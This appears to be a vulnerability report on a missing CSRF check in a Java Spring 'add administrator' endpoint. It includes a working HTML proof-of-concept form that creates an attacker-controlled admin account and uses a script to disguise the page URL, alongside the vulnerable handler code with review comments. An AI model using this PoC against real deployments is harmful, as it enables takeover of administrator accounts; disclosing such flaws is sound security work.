Open
Description
The "add administrator" endpoint (`POST /system/admin/admin_save`) performs no CSRF defense: it neither requires an anti-CSRF token nor validates the request's Origin/Referer header. Because the handler binds its fields straight from an ordinary form post, any site a logged-in administrator visits can submit this form in the administrator's session and create a new, attacker-controlled administrator account.
PoC:
<!-- CSRF proof of concept for POST /system/admin/admin_save.
     The form is a plain application/x-www-form-urlencoded POST, so a browser
     submits it cross-site with no CORS preflight and, unless the session
     cookie is SameSite-restricted (not shown in the report - confirm),
     attaches the victim's session cookie. The handler binds the fields and
     applies no token or Origin/Referer check. Host this page on an
     attacker-controlled origin and have a logged-in administrator open it. -->
<html>
<body>
<!-- Rewrites the address bar so the page URL gives the victim nothing to notice. -->
<script>history.pushState('', '', '/')</script>
<!-- Field names mirror the Admin bean bound by addAdminSave. The roleId is
     presumably an instance-specific identifier from the reporter's setup;
     substitute a valid administrator role id for the target deployment. -->
<form action="http://localhost/system/admin/admin_save" method="POST">
<input type="hidden" name="adminName" value="Diazrael" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="repassword" value="123456" />
<input type="hidden" name="nickName" value="Diazrael" />
<input type="hidden" name="roleId" value="272835742965968896" />
<input type="hidden" name="email" value="Diazrael@admin.com" />
<!-- As written the PoC needs one click from the victim; the request it
     sends is indistinguishable from a legitimate admin-creation post. -->
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Vulnerable code (the handler accepts the bound form fields directly and contains no CSRF check; whether the surrounding security filter chain enforces one for this route is not shown here):
// Handle and persist the administrator-creation form
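/**
 * Handles the "add administrator" form and persists the new account.
 *
 * <p>Security note (review): this endpoint creates a privileged account from
 * plain form fields bound straight off the request. Nothing in this method
 * verifies an anti-CSRF token or the request's Origin/Referer header, so
 * unless the application's security filter chain enforces CSRF protection
 * for this route (not visible here - confirm), a logged-in administrator who
 * loads an attacker's page can be made to submit this form and create an
 * attacker-controlled administrator. Enable the framework's CSRF protection
 * for this mapping rather than hand-rolling a check inside the handler.
 *
 * @param admin  the administrator to create, bound from the request fields
 * @param result bean-validation outcome for {@code admin}
 * @return a {@link DataVo} describing success, the first validation error,
 *         or the service failure; never {@code null} from this method itself
 */
@PostMapping("/admin_save")
@ResponseBody
public DataVo addAdminSave(@Valid Admin admin, BindingResult result) {
    if (result.hasErrors()) {
        // Only the first violation is reported, as the original loop did
        // (it returned on its first iteration). The original returned null
        // for an empty error list, which produced an empty response body;
        // fall back to the generic failure instead.
        List<ObjectError> errors = result.getAllErrors();
        if (errors.isEmpty()) {
            return DataVo.failure("操作失败");
        }
        return DataVo.failure(errors.get(0).getDefaultMessage());
    }
    try {
        return adminService.addAdmin(admin);
    } catch (Exception e) {
        // NOTE(review): echoing e.getMessage() to the client can leak internal
        // details (persistence/constraint text). Kept for response
        // compatibility; prefer logging the exception server-side and
        // returning a generic message.
        return DataVo.failure(e.getMessage());
    }
}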